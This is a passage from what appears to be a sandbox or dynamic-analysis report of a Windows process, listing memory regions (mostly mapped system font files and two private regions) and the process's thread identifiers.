filename = "\\Windows\\Fonts\\TEMPSITC.TTF" (normalized: "c:\\windows\\fonts\\tempsitc.ttf")
Region:
id = 2339
start_va = 0x2940000
end_va = 0x2959fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "vineritc.ttf"
filename = "\\Windows\\Fonts\\VINERITC.TTF" (normalized: "c:\\windows\\fonts\\vineritc.ttf")
Region:
id = 2340
start_va = 0x2960000
end_va = 0x2970fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "vivaldii.ttf"
filename = "\\Windows\\Fonts\\VIVALDII.TTF" (normalized: "c:\\windows\\fonts\\vivaldii.ttf")
Region:
id = 2341
start_va = 0x560000
end_va = 0x56dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "vladimir.ttf"
filename = "\\Windows\\Fonts\\VLADIMIR.TTF" (normalized: "c:\\windows\\fonts\\vladimir.ttf")
Region:
id = 2342
start_va = 0xd10000
end_va = 0xd20fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "wingdng2.ttf"
filename = "\\Windows\\Fonts\\WINGDNG2.TTF" (normalized: "c:\\windows\\fonts\\wingdng2.ttf")
Region:
id = 2343
start_va = 0x570000
end_va = 0x578fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "wingdng3.ttf"
filename = "\\Windows\\Fonts\\WINGDNG3.TTF" (normalized: "c:\\windows\\fonts\\wingdng3.ttf")
Region:
id = 2344
start_va = 0x8a0000
end_va = 0x8a1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mtextra.ttf"
filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\equation\\mtextra.ttf")
Region:
id = 2345
start_va = 0x8f0000
end_va = 0x8f6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "marlett.ttf"
filename = "\\Windows\\Fonts\\marlett.ttf" (normalized: "c:\\windows\\fonts\\marlett.ttf")
Region:
id = 2353
start_va = 0x2ce0000
end_va = 0x2edffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002ce0000"
filename = ""
Region:
id = 2354
start_va = 0x2d00000
end_va = 0x2dfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002d00000"
filename = ""
Region:
id = 2355
start_va = 0x580000
end_va = 0x5c8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "~fontcache-system.dat"
filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-system.dat")
Thread:
id = 154
os_tid = 0x550
Thread:
id = 155
os_tid = 0x54c
Thread:
id = 156
os_tid = 0x548
Thread:
id = 157
os_tid = 0x544
Thread:
id = 158
os_tid = 0x540
Thread:
id = 159
os_tid = 0x51c
Thread:
id = 160
os_tid = 0x404
Thread:
id = 161
os_tid = 0x288
Thread:
id = 162
os_tid = 0x27c
Thread:
id = 163
os_tid = 0x278
Thread:
id = 164
os_tid = 0x128
Thread:
id = 165
os_tid = 0x124
Thread:
id = 166
os_tid = 0x60
Thread:
id = 167
os_tid = 0x3d0
Thread:
id = 168
os_tid = 0x3bc
Thread:
id = 169
os_tid = 0x554
Thread:
id = 171
os_tid = 0x55c
Thread:
id = 172
os_tid = 0x56c